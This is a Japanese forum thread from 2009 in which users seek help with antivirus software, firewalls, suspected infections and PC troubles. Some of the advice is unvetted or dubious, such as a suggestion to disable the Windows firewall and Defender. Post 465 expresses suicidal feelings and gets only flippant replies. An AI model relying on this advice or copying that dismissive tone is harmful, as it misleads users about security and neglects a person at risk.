451名無しさん@お腹いっぱい。:2009/07/18(土) 20:28:31
どれもお奨めじゃない
452名無しさん@お腹いっぱい。:2009/07/18(土) 21:30:11
(ο^д^)ノシ
453名無しさん@お腹いっぱい。:2009/07/18(土) 22:39:45
>>434
GDATAがおすすめ
454名無しさん@お腹いっぱい。:2009/07/19(日) 00:22:01
>>434
ノートン2009で決定。
455名無しさん@お腹いっぱい。:2009/07/19(日) 00:22:43
>>434>>449ですか?
456ネット初心者:2009/07/19(日) 00:44:53
ユーザ-----インターネット----ルータ----Fire Wall----L2スイッチ----Webサーバ
                                   |
                                   |
                                   |

                                 監視装置

上の図において、ファイアウォールの設定が
「インターネット側からはWebサーバ(ポート80)へのパケットしか通さない。」
「プライベート側からは全て通す」
とした場合、監視装置からルータへのPing監視は出来ますか?
Ping打っても返ってこれないと思うんですが。。。
457名無しさん@お腹いっぱい。:2009/07/19(日) 00:50:08
ょぅι゙ょ 禁止!
458名無しさん@お腹いっぱい。:2009/07/19(日) 01:26:43
>>434
どう見ても乗り換えないほうが幸せです。カスペを更新しましょう。

ノートン:最新のマルウェアへの対応が遅い
ZERO:防御力零と揶揄される位にすり抜けが多い。投げ捨て対象。

あとSP2のまま使うな、SP3まできちんとWindowsUpdateあてろ。セキュリティソフト入れても他のとこに穴残してどうする。
459名無しさん@お腹いっぱい。:2009/07/19(日) 01:50:39
SP3って無理だろw
460名無しさん@お腹いっぱい。:2009/07/19(日) 01:52:13
勘違いしてるね
461 ◆N9P3SuvBPo :2009/07/19(日) 02:10:44
俺からも

>434
どう見てもカスペを使い続ける方が無難だと思いますね。

>>458
ちゃんとvistaって書いてありますよ。
>osはwindowsvistasp2で
って
462名無しさん@お腹いっぱい。:2009/07/19(日) 03:10:32
おっと、失敬、VistaとXPを読み間違えてた。目が疲れてるようだから寝るわ。
463名無しさん@お腹いっぱい。:2009/07/19(日) 03:43:42
GENOの対策ならまずはFlashPlayerの更新が先かと
464名無しさん@お腹いっぱい。:2009/07/19(日) 11:26:23
(ο^д^)ノシ
465名無しさん@お腹いっぱい。:2009/07/19(日) 17:00:00
生きててもつらいし、後悔ばかりでなんのために生まれてきたのか・・
いっそ死んでしまえばすっきりするかと思ったりするんですが
みなさんは何のために生きてるんですか?
死にたいとか思ったりしませんか?
466名無しさん@お腹いっぱい。:2009/07/19(日) 18:06:56
すいません
スレ違いですね
467名無しさん@お腹いっぱい。:2009/07/19(日) 19:51:50
>>465
我思う、故に我在り
468名無しさん@お腹いっぱい。:2009/07/19(日) 21:30:39
>>465
仏門にでも入れ。
469名無しさん@お腹いっぱい。:2009/07/19(日) 23:02:15
俺はお金がほしい
毎月貯金額が増えていくのが楽しい
470名無しさん@お腹いっぱい。:2009/07/19(日) 23:14:27
ウイルスバスターをインストールしました
これに併せて入れておくべきフリーのソフトウェアを教えてください

前はSPYBOTとADAWREを入れてました。
471名無しさん@お腹いっぱい。:2009/07/19(日) 23:15:06
>>470
その手のスレは他に有る
472名無しさん@お腹いっぱい。:2009/07/19(日) 23:21:22
>>470
それ以前にWindowsファイヤーウォールとwindows defenderを無効にしましたか?
473名無しさん@お腹いっぱい。:2009/07/19(日) 23:23:05
>>470
砂箱入れとけそれで終わりじゃ
474名無しさん@お腹いっぱい。:2009/07/19(日) 23:24:25
Windowsファイヤーウォールは無効でいいけどWindows defenderは有効でいいんじゃない?
475470:2009/07/19(日) 23:57:35
>>472>>474
それはどうしてでしょうか?
両方あれば二重に強力ということではないのですか?
ルーターもつないでますがそれもはずすべきなのでしょうか?

>>473
すみません。略称ではわからないので正式名お願いします。
476名無しさん@お腹いっぱい。:2009/07/20(月) 00:00:11
>>475
http://www.google.co.jp/search?hl=ja&q=%E7%A0%82%E7%AE%B1&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
477名無しさん@お腹いっぱい。:2009/07/20(月) 00:01:25
>>475
悪い事は言わんセキュやるの止めとけ
478名無しさん@お腹いっぱい。:2009/07/20(月) 00:05:34
うちのウィルスクリアが、ブロックしました。

Registry Winner トップページ
ttp://www.fixregistrynow.com/jp.asp?mk=g2rc&gclid=CJDb7ei55JoCFc0tpAoddByPCQ

ご検出でしょうか?
ウィルスクリアの設定が高すぎでしょうか?
479470:2009/07/20(月) 00:10:40
>>471
レスが遅れてすみません。
どのスレでしょうか?
あまり慣れてないので教えていただけると助かります。

>>476
ありがとうございます。

>>477
すみません。文意がよく飲み込めません。
セキュリティをやるのを止めるとはどういうことですか?
480名無しさん@お腹いっぱい。:2009/07/20(月) 01:31:35
winnyをよくやってるんですが、winnyみたいに日本でしか使われていないソフトに発生する
ウイルスって、海外製のウイルス対策ソフトの対応度合いってどうなんでしょうか?
winnyやるなら国産の(といってもウイルスバスターしかないのかしら?)の方が良いでしょうか?

アホみたいな質問で済みません・・。
481名無しさん@お腹いっぱい。:2009/07/20(月) 01:32:30
>>480
悪いことは言わん
嫌な思いをしたくないのなら二度とこのスレ見ないほうがいいぞ
482名無しさん@お腹いっぱい。:2009/07/20(月) 01:34:23
>>478
リンク先踏んでもウイルスはない。
たしかウィルスクリアってバスターのOEMだったよね。
今年にはいってバスターは生協とかgoogleキャッシュとかブロックしなかったっけ?
高いのは設定ではなくRegistry Winnerの価格かと。あくまで個人の感覚だけどね。
レジストリクリーナの一年間ライセンス$34.95…
483名無しさん@お腹いっぱい。:2009/07/20(月) 01:38:10
>>480
ダウソ板から出てこないでください。むしろ、カエレ。(門前払い)
484名無しさん@お腹いっぱい。:2009/07/20(月) 01:42:07
>>479
【無料】 フリーセキュリティの組合せ 11
http://pc11.2ch.net/test/read.cgi/sec/1243903856/

【N豚N奴】一番いいセキュリティソフトはなんだ!!50
http://pc11.2ch.net/test/read.cgi/sec/1208084584/
485480:2009/07/20(月) 01:51:52
すいません、よそでききます。
486名無しさん@お腹いっぱい。:2009/07/20(月) 04:41:32
【使用OS】      『WindowsVista sp2』
【PCスペック】    『CPU: 3.00GHz 、メモリ: 2MB』
【使用ブラウザ】  『Firefox 3』
【Microsoft Updateの更新の状態】 『自動更新設定、最新の状態』
【セキュリティソフトと年式】     『Norton Internet Security2009』
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】  『光回線でルータ使用中』

【具体的な症状】
ブラウザがFirefoxで『NoScript』というものを使っています。
こちらのサイト(通販のサイトです)ttp://www.littlegarden.co.jp/
で買い物をしたいのですが、商品をカートに入れようとすると(入れると)
「クロスサイトスクリプティングの可能性があるアクセスを遮断しました」という注意が出ます。

こちらのサイトでは買い物をしない方が良いのでしょうか?
注意を無視するとどうなってしまうのでしょうか?
買い物をしても良い場合、気をつけないといけない事はありますでしょうか?

どうぞ宜しくお願いします。
487名無しさん@お腹いっぱい。:2009/07/20(月) 05:17:49
デスクトップとかプログラムフォルダとか一々フォルダにアクセスする度にパケットが流れるんですけど
ルータのバグかなんかかな
ノートンでスキャンしても何もないって出るし
でも気持ち悪い
488名無しさん@お腹いっぱい。:2009/07/20(月) 08:06:21
定番の無料のファイアーウォールとアンチウイルスソフトの組み合わせ教えていただけませんか?
よろしくお願いします
489名無しさん@お腹いっぱい。:2009/07/20(月) 09:04:05
>>488
これ↓はどうかな?

 http://www.avgjapan.com/
490名無しさん@お腹いっぱい。:2009/07/20(月) 09:32:53
>>488
【無料】 フリーセキュリティの組合せ 11
http://pc11.2ch.net/test/read.cgi/sec/1243903856/

私はAntiVirとPC ToolsのFW使ってますが定番じゃないと思います。
491八頭 ◆YAGApwSaEw :2009/07/20(月) 10:04:12
>>486
>商品をカートに入れようとすると(入れると)
>「クロスサイトスクリプティングの可能性があるアクセスを遮断しました」という注意が出ます。
『NoScript』のせいで、通販サイトの買い物カゴがうまくいかないんでしょう

>買い物をしても良い場合、気をつけないといけない事はありますでしょうか?
信頼性のあるメーカーサイト以外は捨てメルアドでのやりとりが無難かな
ナニ人かも判らないような個人商店やオークションは情報の保障とかないでしょ
492名無しさん@お腹いっぱい。:2009/07/20(月) 10:34:49
>>491
役に立たない回答する位なら出てくるな。
493名無しさん@お腹いっぱい。:2009/07/20(月) 10:40:26
ウィルス対策ソフトって何個くらい入れればいいんですか?
494名無しさん@お腹いっぱい。:2009/07/20(月) 11:12:30
>>493
って言うか、一般的な総合セキュリティーソフト1個で全然十分です。
495名無しさん@お腹いっぱい。:2009/07/20(月) 11:15:23
>>494
アバスト入れておけば問題ないですか?
496名無しさん@お腹いっぱい。:2009/07/20(月) 11:57:20
質問です。
win2000sp4ディスクで内蔵ハードディスクをフォーマットしてOSをインストールして、
IE6sp1をダウンロードしてインストールしたあと再起動をして、Lhaplusという解凍ソフトをダウンロードしてexeを実行したとき、
プログラム開始エラー(プログラムのファイルに異常が発見されたため、実行を中断します。)が生じました。
また、オンラインスキャンを行おうとしたところ、正常にスキャンができませんでした。
この場合、HDがクリーンになったにもかかわらず、ウィルスが存在していることを意味しているように思われます。
その場合、どこにウィルスが存在する可能性があるかわかりますか?
また、対策などあるのでしょうか?
497名無しさん@お腹いっぱい。:2009/07/20(月) 12:06:44
どこに:割れOSのCD-ROM
対策:割らない
498名無しさん@お腹いっぱい。:2009/07/20(月) 12:14:16
割れ(コピー)じゃなくて正規のディスクですよ。
CMOSの短絡をしようかと思っていますが、ほかに感染経路の可能性があれば教えてください。
499名無しさん@お腹いっぱい。:2009/07/20(月) 13:08:13
セーフモードでちゃんとメモリも検査したか?
500名無しさん@お腹いっぱい。:2009/07/20(月) 13:39:09
>>496
ウイルス感染よりシステムエラーを疑うべきかと
OSあるいはIE6sp1のインスコミスでシステムファイルがぶっ壊れてるか
>>499さんの言うようにハードウェアの異常(HDDやメモリ)かな

ウイルスだとしたら相当深いレベルで感染してるし
感染源も解決方法もわかるとは思えないから
結局クリーンインスコするはめになると思うよ

>また、対策などあるのでしょうか?
ウイルスが怖いならオフラインで一通りのセットアップは済ませること
個人的にはそんな神経質になる必要は無いと思うけどね
501名無しさん@お腹いっぱい。:2009/07/20(月) 13:46:43
ノートン アンチウィルス2009 ゲームエディションっていうの買って入れて
みたのですが、これはアプリ毎の通信の遮断はできないんですね。

これを入れたまたアプリ毎に通信の遮断を掛けたい場合は、どんな
ソフトを入れればいいのでしょうか?
502名無しさん@お腹いっぱい。:2009/07/20(月) 14:38:42
【使用OS】   ウィンドウズXP
【PCスペック】    『CPU: 1GHz 、メモリ:16 MB』  (「システムのプロパティ」参照)
【使用ブラウザ】 IE7
【Microsoft Updateの更新の状態】 自動更新設定
【セキュリティソフトと年式】   シマンテックエンドポイントプロテクション 2009
【その他スパイウェア対策ソフト】 なし
【回線の種類・ルータの有無】  LAN

【具体的な症状】 
ウイルスソフトのシマンテックエンドポイントプロテクション
というものがパソコンに入っております。

これがあまりに頻繁に動くのでスキャンとアップデートの頻度を変えようと
思い、設定変更からスキャンを6日23時間に一回、アップデートを毎週に
かえようとしています。

しかし、ひとたび再起動すると自動的にスキャンが1時間に一回、
アップデートが一日一回かつ失敗時には一時間に一回再試行に設定変更されます。

これはわずらわしいので、設定を保存する方法、またはシマンテックを
軽く使う方法があれば教えてください。よろしくお願いします。
503名無しさん@お腹いっぱい。:2009/07/20(月) 14:44:06
メモリ16MB?
504名無しさん@お腹いっぱい。:2009/07/20(月) 14:47:42
はい ノートパソコンなので
505名無しさん@お腹いっぱい。:2009/07/20(月) 14:51:19
ウィンドウズXP動くの
506名無しさん@お腹いっぱい。:2009/07/20(月) 14:53:56
もしかしたら数字は違っていたかもしれません
ただXPは動くし、ユーチューブも見られます
507名無しさん@お腹いっぱい。:2009/07/20(月) 15:05:25
16Mwwwねえよwww
508名無しさん@お腹いっぱい。:2009/07/20(月) 15:08:46
デスクトップとかプログラムフォルダとか一々フォルダにアクセスする度にパケットが流れるんですけど
ルータのバグかなんかかな
ノートンでスキャンしても何もないって出るし
でも気持ち悪い
509 ◆N9P3SuvBPo :2009/07/20(月) 15:11:20
16MBじゃ9x動くかどうかわからねーし!
XPだったら120%うごかねえってw

>502
>シマンテックエンドポイントプロテクション
企業で使用してるPCでしょうか?
そうならシステム管理者を説得するしかないと思いますよ。
510名無しさん@お腹いっぱい。:2009/07/20(月) 15:13:11
16ギガだったかもしれません(苦笑
システム管理者がそういう設定にしてるってことですかね
511名無しさん@お腹いっぱい。:2009/07/20(月) 15:16:10
>>499, 500
クリーンインスコを何度やってもPCが落ちてしまいます。
IE6sp1と解凍ソフトのダウンロード程度なので、感染経路がネットワークではないと思われます。
HDDはまっ白のため、メモリかマザーのCMOSが原因かと考えています。
safeモードでのメモリのチェックの具体的な方法がわかりませんが、探してみます。
(時間が経てば勝手に落ちてしまうため、メモリ−が原因な気がします。
ただ今までは正常だったため、マルウェアの所為かと思ってます。
safeモードでは、PCが落ちることはないようです。)
かりにメモリーのエラーが判明した場合、メモリーは全換えなのでしょうかね・・
512名無しさん@お腹いっぱい。:2009/07/20(月) 15:21:02
>16ギガだったかもしれません(苦笑



    /::::i::::、:::ヽ、:::\:ヽ:\::ヽ:、:ヽ:、:',    早  駄
    /::i|::l::ト、ヽ::、:ヽ:、:::::\::ヽ::l:ヽ:i::i:::!    く   目
   /:/:!:::!:|::ヽ:\ヽ:::、:\::ヽ:ヽ!:::i::|:::!::!   な  だ
   !ハ::|::::i::l:|心、:ヽ::\:ヽ_\、\:ヽ:|!:|:|i.  ん
    i、:!:|:、N{、ヒjヽゝ\ヾイ ヒj >、ヽi:、:|:l:   と   こ
     ヽ:!::トヽ ̄ l! `  ` ̄´ |::l::|:|j:,!:!  か  い
      ト、::! u         j |::/lj:::!リ  し  つ
        ヾ、  丶 -    u リイ:|リ   な   :
        リヽ ‐、ー- 、_   /イ:::i    い  :
       rー'"ト:l゙、   ̄   ./  , |::!    と   :
      / ヘ ヾ ヽ、 _,. '   / |:'  
513 ◆N9P3SuvBPo :2009/07/20(月) 15:21:11
>511
OSクリーンインストール作業について

LANケーブルを抜いてやったか
クリーンインストール後、セキュリティソフトをインストールしたか
ルータは設置してあるか
514名無しさん@お腹いっぱい。:2009/07/20(月) 15:49:13
>>511
>ただ今までは正常だったため、マルウェアの所為かと思ってます。
どう考えても、マルウェアを疑う要因がありません。セキュリティの問題じゃない。
ここでは取り扱いできませんので、お引き取りください。

ハード的なものと思われる(ただの熱暴走かもしれないが)ので、メーカーに修理に出すなり、
MEMTESTやCHKDSKやPC内の掃除など、自分で原因を追及して問題箇所を直すなりしてくれ。

M/BのCPU付近のコンデンサが膨れてたり液漏れしてたらM/Bがお亡くなりです。

515名無しさん@お腹いっぱい。:2009/07/20(月) 15:51:53
>>502
権限のない奴がいじっても無効です。

企業・法人向けのもののようですので、会社のPCと思われますが、勝手に設定をいじらないように。
あなたの責任問題になりますよ。最悪クビです。
516 ◆N9P3SuvBPo :2009/07/20(月) 16:00:17
>514
マルウェアが原因だと思いますね。
セキュリティソフトもルーターもない"Windows2000 SP4"では
ネットに繋いだだけでもマルウェアに感染してしまいますからね。
しかもXPやVistaみたいに標準のファイアーウォールはありませんから。

>IE6sp1と解凍ソフトのダウンロード程度
であってもネットワーク経由でウイルスに感染する危険性がありますしね。
517名無しさん@お腹いっぱい。:2009/07/20(月) 16:00:42
502です
わかりました
首にならないようにこのままの設定で我慢しようと思います
本当にありがとうございました
518名無しさん@お腹いっぱい。:2009/07/20(月) 16:06:49
個人情報のないパソコンなら不調になればリカバリでたいてい問題ないですかね?
メールもしないんですけど
519 ◆N9P3SuvBPo :2009/07/20(月) 16:09:53
>518
おk
520名無しさん@お腹いっぱい。:2009/07/20(月) 16:12:04
ありがとうございます
521名無しさん@お腹いっぱい。:2009/07/20(月) 17:33:51
デスクトップとかプログラムフォルダとか一々フォルダにアクセスする度にパケットが流れるんですけど
ルータのバグかなんかかな
ノートンでスキャンしても何もないって出るし
でも気持ち悪い
522名無しさん@お腹いっぱい。:2009/07/20(月) 17:35:41
感染してるな
523名無しさん@お腹いっぱい。:2009/07/20(月) 18:46:24
横からですが、うちもコンピュータとか開くと、なんか作動してますね。
パフォーマンスモニタのネットワーク欄を見ながら、エクスプローラ起動すると、PID番号が4っていうのが出ます。
タスクマネージャでPID番号4が何か見たら、NT Kernel & System ってなってました。
これも何かウィスル感染してる証拠でしょうか?
524名無しさん@お腹いっぱい。:2009/07/20(月) 18:53:32
文字どおりカーネルが動いてるだけだろ。
525 ◆N9P3SuvBPo :2009/07/20(月) 19:08:33
>>523
>PID4
極普通のこと。
よって全然問題なし。
526523:2009/07/20(月) 19:46:57
>>525
安心しました。ありがとう。
527470:2009/07/20(月) 19:49:34
ウイルスバスターを入れたらWindowsのFWとDFを切らなくてはいけないのですか?
528名無しさん@お腹いっぱい。:2009/07/20(月) 20:05:16
タスクマネージャを見ていたところ、rundll32が2つ動いているのを見つけました。
調べてみたらウイルスの可能性もありそうなので
気になってProcessWalker Expressで見てみたんですが
プロパティのコマンドラインの部分がそれぞれ

rundll32 nView.dll,nViewInitialize
"C:\WINDOWS\system32\RUNDLL32.EXE" C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit
と表示されていました。

モジュール部分には2つともほぼ同じものが表示されていました。
avast、Ad-aware、spybot、a-squared FreeでCドライブをスキャンしても何も出なかったんですが何か不安で・・・
ウイルスか何かでしょうか?
529名無しさん@お腹いっぱい。:2009/07/20(月) 20:17:54
>>528
NVIDIA nView Desktop Managerでしょ。NVIDIAのグラフィック使ってればインストールされる。
特に困らないなら削除してみては?
うちはウィルス等とは別の理由で削除してる。
530528:2009/07/20(月) 20:26:34
>>529
迅速な回答ありがとうございます。
確かにグラフィックボードはNVIDIAのものでした。

どちらがNVIDIA nView Desktop Managerのやつなんでしょう?
それとも両方ともなんでしょうか

特に問題なさそうで安心しました。
よろしければ削除している理由も教えていただけませんか?
531名無しさん@お腹いっぱい。:2009/07/21(火) 01:36:34
なぜ怪しいサイトにはウィルスとかが多いっていわれるんでしょうか?
怪しいサイトを見るときはみんな用心するだろうから
効率悪くないですか?
532名無しさん@お腹いっぱい。:2009/07/21(火) 01:41:24
逆だから。
533 ◆N9P3SuvBPo :2009/07/21(火) 03:32:42
うーん最近では普通のサイトでも入ってくるよ。
鯖が乗っ取られてHTMLに不正コード仕込まれてって…
いつも見てる安全なサイトが、いつ配布サイトに豹変するか誰にも予測はできないから。
534名無しさん@お腹いっぱい。:2009/07/21(火) 11:24:56
【使用OS】   Windows Vista SP2
【PCスペック】    『CPU: 2.6GHz 、メモリ:3GB』
【使用ブラウザ】 IE8
【Microsoft Updateの更新の状態】 自動更新設定
【セキュリティソフトと年式】   ウィルスバスター2009
【その他スパイウェア対策ソフト】 なし
【回線の種類・ルータの有無】  ADSLモデム、有線使用

【具体的な症状】
ウィルスバスターを起動した状態で、インターネットに接続(Web閲覧、パターンファイルの更新)すると
必ず1分程度で接続が切れます。状況的にはモデムにPINGが通らなくなり、ネットワークデバイスの再起動
しなければ回復しません。ウィルスバスターを起動していなければ接続は切れません。
またウィルスバスターの全ての機能を無効にしていても、起動していれば接続が切れます。
トレンドマイクロに問合せ、手順どおり再インストールを行いましたが状況は変わりませんでした。
なお、試しにカスペルスキーをインストールしてみましたが同様の症状が出ました。

何か解決方法があれば教えてください。よろしくお願いします。
535名無しさん@お腹いっぱい。:2009/07/21(火) 12:25:49
今ノートン2009を入れてるのですが、
avastも入れて大丈夫でしょうか?
この2つは共存出来ますか?
536名無しさん@お腹いっぱい。:2009/07/21(火) 12:27:15
ダメです。
基本的に出来ません。
537名無しさん@お腹いっぱい。:2009/07/21(火) 13:46:20
>>536
そうですか…
ありがとうございました
538名無しさん@お腹いっぱい。:2009/07/21(火) 15:59:52
IEやファイヤフォックスでネット繋いでると勝手に他の海外のページを開いたりします。これは完全に感染してますよね??
セキュリティソフトは入れてないのですが、ウイルスバスター2009のオンラインチェックでは検出されなかったのですが…
539名無しさん@お腹いっぱい。:2009/07/21(火) 16:02:05
>セキュリティソフトは入れてない
論外
540名無しさん@お腹いっぱい。:2009/07/21(火) 17:05:46
>>538
Kaspersky? Virus Removal Tool でも試してみたら
ttp://devbuilds.kaspersky-labs.com/devbuilds/AVPTool/
541 ◆N9P3SuvBPo :2009/07/21(火) 17:12:02
>538
感だけどもしやbigfishgamesやamigos.comなどのサイト?
けどセキュリティソフトを入れてないってのはねぇー…
542名無しさん@お腹いっぱい。:2009/07/21(火) 20:16:25
【使用OS】
『XP』
【PCスペック】
CPU:1.29GHz 、メモリ:224MB
【Microsoft Updateの更新の状態】 『自動更新』


今までフレッツに加入していてフレッツのセキュリティ対策に加入してたのですが
最近EO光に替えたので新しいセキュリティ対策ソフトを考えます。
ノートンとカスペルスキーの体験版は試しましたがどれがいいとか正直わかりません。
パソコンに弱いので、設定も難しくなく安全なもので何かオススメを教えて下さい!
543名無しさん@お腹いっぱい。:2009/07/21(火) 20:57:01
スペックきついな〜
544名無しさん@お腹いっぱい。:2009/07/21(火) 21:41:48
>>543
6〜7年前に買った家族共有のモノなんですがPC音痴で全くいじってません。
買い換えずにスペック上げられるんですかね?
その低スペックのせいかセキュリティソフトも何入れても遅いんですよね…orz
545名無しさん@お腹いっぱい。:2009/07/21(火) 22:01:32
>>544
6〜7年前のPCなら増設メモリは入手可能と思いますので最低でも256M増設を。
増設に自信が持てないなら、お店によっては有料でしょうが増設してくれるとこもありますよ。
546名無しさん@お腹いっぱい。:2009/07/21(火) 22:07:36
ノートン先生って常時っていうか不定期にパケット垂れ流してる?
ファイル開くときとかゴミ箱のゴミ削除するときとかもパケット送ってる?
547名無しさん@お腹いっぱい。:2009/07/21(火) 22:18:23
>>542-544
>パソコンに弱いので、設定も難しくなく安全なもので何かオススメを教えて下さい!
難しいこと言いますね。完璧に要求を満たすものはないと思いましょう。
あと、パソコンに弱いのは覚えろということで、免罪符にはなりません。

低スペックのPCという前提では、ESS(NOD32)が一番のお勧めになると思います。
セキュリティをもっと安心できるものにする為には、AntiVirにするともっと幸せになれます。
但し、AntiVirの場合は、設定が簡単とはいかないでしょう。英文を理解できるならAntiVirの方がいいです。

■ESS(NOD32)
 非情に軽い/日本語対応/新種への対応遅い/ヒューリスティック弱い/すり抜けは比較的多め
 ESSはPFWあり(NOD32はなし)

■AntiVir
 非情に軽い/英文のみ/新種への対応早い/ヒューリスティックそれなり/すり抜け少ないが逆に過敏
 PFWなし(有料版にはあり)/広告が1日1回大きいのが出る

■KINGSOFT
 そこそこ軽い/日本語対応で表現も平易/新種への対応遅い/すり抜けはかなり多い(ので非推奨)
 PFWもついている
548名無しさん@お腹いっぱい。:2009/07/21(火) 22:21:12
>>542(追記)
PCのスペックについてはもうちょっときちんと埋めないと、回答困難です。きちんとテンプレを埋めましょう。
最低限メモリを1GB程度にしないとスワップ発生して重いだけだと思います。(物によってはそこまで増やせません)

スペックがわからなければ、下記のツール等で調べてみてください。
System Check Tool for PC Games ttp://www.microsoft.com/downloads/details.aspx?FamilyId=AB643AF1-EEF7-41AF-908B-1FD9647396EE&displaylang=ja
KOEI SYSTEM VIEWER       ttp://www.gamecity.ne.jp/products/ksv/ksv.htm

>買い換えずにスペック上げられるんですかね?
メモリを増設する、CPUを高速なものに替える、GPUを増設するなどの方法が考えられますが
古いものなので逆に高くついてしまう場合や、スロットがなくて増設不可能、電源容量が足りないなどの
問題が発生するかもしれません。

メーカー製なら型番を、BTOや自作ならスペックを晒して貰えれば改善策は出てくるかもしれませんが
ここではスレ違いになってしまいますので、適切なスレを探して相談してみてください。
549名無しさん@お腹いっぱい。:2009/07/21(火) 22:23:40
>>546
ノートンには「接続維持」という機能があります。

ダイヤルアップやイーモバイル回線でない場合(一般的な常時接続環境)だと不要のものですが
それが一定時間ごとに通信を発生させています。
550名無しさん@お腹いっぱい。:2009/07/21(火) 22:36:06
>>542ですが皆様方、沢山の解答ありがとうございます。
スレ違いの事まで答えて下さって感謝しています!

今はセキュリティ対策ソフトはカスペルスキーの体験版使ってます。
普通にネットしたり動画見たりDVDコピーしたりするぐらいなんですが
評判の良いカスペルスキーかノートンかを購入しておけば無難ですかね?
551名無しさん@お腹いっぱい。:2009/07/21(火) 22:41:41
DVDコピーって違法だろ
552名無しさん@お腹いっぱい。:2009/07/21(火) 22:47:28
>>524
タスクバー(画面下の青い帯)を右クリック>タスクマネージャー>パフォーマンス
>コミット チャージ (KB)の最大値 が244M(249856)を大幅に超えているようなら
メモリ増設したほうが…というより増設しなければ。
547さんの紹介に会ったESSでも今のままではちょっとry
553470:2009/07/21(火) 22:48:49
誰か527を説明してください
554552:2009/07/21(火) 22:59:55
>>524もとい>>542
>>553
windowsのFWきっておきばいい。
現行版のバスターはインストール時自動できれなのか?
555名無しさん@お腹いっぱい。:2009/07/21(火) 23:00:59
windowsXP Version2002 ServicPack3 のPCを使っています。
今使用しているPCは最近修理に出したものです。

修理前に普通にインストールすることができたウイルスバスター2008が、修理後(データを初期化され、今使用している)のPCにはインストールするとこがありません。

このバージョンのwindowsと互換性がありませんと出て、そのご続行を押しインストール自体は始まります。
しかしインストールがはじめり途中で進行が止まり戻ります。
インストール前のウィルスチェックにも問題はありませんでした。

556名無しさん@お腹いっぱい。:2009/07/21(火) 23:01:54
>>555
修理後(データを初期化され、今使用している)のPCにはインストールするとこがありません。
⇒修理後(データを初期化され、今使用している)のPCにはインストールするとこができません。

誤字です、申し訳ない
557名無しさん@お腹いっぱい。:2009/07/21(火) 23:19:58
>>556
先ずは本家のQ&Aを
http://www.google.co.jp/search?hl=ja&rlz=1T4GGLJ_jaJP256JP264&q=%E3%83%90%E3%82%B9%E3%82%BF%E3%83%BC2008%E3%80%80windows%E3%81%A8%E4%BA%92%E6%8F%9B%E6%80%A7%E3%81%8C%E3%81%82%E3%82%8A%E3%81%BE%E3%81%9B%E3%82%93&lr=
558名無しさん@お腹いっぱい。:2009/07/22(水) 00:06:13
>>557
この方法を試しましたができませんでした。
559 ◆N9P3SuvBPo :2009/07/22(水) 01:03:30
修理前はちゃんと出来たのが、修理後には出来なくなった…か

今一度、システムのプロパティを開いて、OSのバージョンを確認してみて。
560名無しさん@お腹いっぱい。:2009/07/22(水) 01:06:39
>>555-556
WindowsUpdateをかけて、本当にSP3になっているか確認すること。あと、DirectX9.0cを入れ直しだったかな。
入れ直す前に、アンインストールツールを使用して、残っているかもしれない残骸を全て抹消しておくこと。
http://esupport.trendmicro.co.jp/Pages/JP-2062915.aspx

メーカーのサポートに相談してもいいかもしれない。
http://esupport.trendmicro.co.jp/Pages/JP-2062273.aspx

あとは、バスター2008ではなく、2009を入れるとか。
無償UPDATE対応になってますし、幾つかの不具合も解消されています。
ttp://jp.trendmicro.com/jp/products/personal/vb2009/freeversionup/index.html
561557:2009/07/22(水) 01:14:15
>>555
サポートページのアンインストールツールを使い、バスターのフォルダが残っていないことを確認。
試供版セキュリティソフトがインストールされていた場合は残骸が残っていないか確認
または、アンインストールツールでry
DLしたバスターをインストール。
これでだめなら本家サポート行きなされ。
>>559
( ´(ェ)`)ノシ
562 ◆N9P3SuvBPo :2009/07/22(水) 01:31:52
φ(・。・)ノシ
563名無しさん@お腹いっぱい。:2009/07/22(水) 01:57:49
なんか頭がクラクラして来ました
564名無しさん@お腹いっぱい。:2009/07/22(水) 02:10:41
【使用OS】      『XP sp3』
【PCスペック】    『CPU: 3.00GHz 、メモリ: 1.96GB』
【使用ブラウザ】  『IE』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】     『ウイルスバスター 2009』
【その他スパイウェア対策ソフト】 『ウイルスバスター 2009』
【回線の種類・ルータの有無】  『光回線でルータ使用』

【具体的な症状】 
ファイアフォックス起動時に一瞬小さいウインドウの残像?が見える
気になってカペルスキーオンラインスキャンをしたら
C:\Program Files\Trend Micro\Virus Buster\Quarantine\195.tmp
がTrojan-PSW.Win32.Nilage.djlに感染しているとでました。

C:\Program Files\Trend Micro\Virus Buster\Quarantineを開いても
195.tmpというファイルが見つかりません。

ファイアフォックス起動時に一瞬小さいウインドウの残像?が見えるのと
このウィルスは関係がありますか?

駆除するには再セットアップでしょうか?
565564:2009/07/22(水) 02:13:29
すみません 【使用ブラウザ】  間違えました
【使用ブラウザ】  『Fire fox 3.0.11』です
566八頭 ◆YAGApwSaEw :2009/07/22(水) 02:20:08
>>564
「Quarantine」は検疫内だから、バスターの検疫操作で掃除できるはず

>ファイアフォックス起動時に一瞬小さいウインドウの残像?
Firefoxスレで、バージョンと追加アドオンと症状を伝えて聞いてみるとか

気になるなら、コレを一度試してみて下さい
Norton PCチェックアップツール (*Norton製品を使っていない人向け *駆除機能はありません)
http://www.symantec.com/ja/jp/norton/theme.jsp?themeid=pccu
567564:2009/07/22(水) 02:34:16
レスありがとうございます

検疫操作とは隔離ファイルの管理であってますでしょうか?
隔離ファイルの管理画面では検出数:0になってます
これはもう安全という事なんでしょうか?

もう一度検索かけてみようと思います
ノートンの方も試してみます
568名無しさん@お腹いっぱい。:2009/07/22(水) 02:40:18
>564はマルチ
569564:2009/07/22(水) 03:06:07
あの、すみません
別のスレとかで質問はしてないんですが
どこかで似た質問がありましたか?

ノートンのチェックアップツールでは何も検出されませんでした
バスターの方も、もう一度検索してみたんですけど何も出てこないので
ウイルスは多分大丈夫なのかと思います

Firefoxの方はもうちょっと自分で調べてみようと思います

長々と失礼しました
ありがとうございました
570名無しさん@お腹いっぱい。:2009/07/22(水) 03:12:05
>>569http://pc11.2ch.net/test/read.cgi/sec/1244633881/95

なんか自演臭がするんだが気のせいか?
571名無しさん@お腹いっぱい。:2009/07/22(水) 03:15:21
>>563
餅ついて一つずつやるんだ
572564:2009/07/22(水) 03:17:56
締めましたけど、すみません
>570
いや、それは自分じゃないです…
何でそっちにも貼られてるんだ…orz
573名無しさん@お腹いっぱい。:2009/07/22(水) 06:45:42
>>549
ありがとうございます
わけのわからない送受信はノートン先生だったのですね
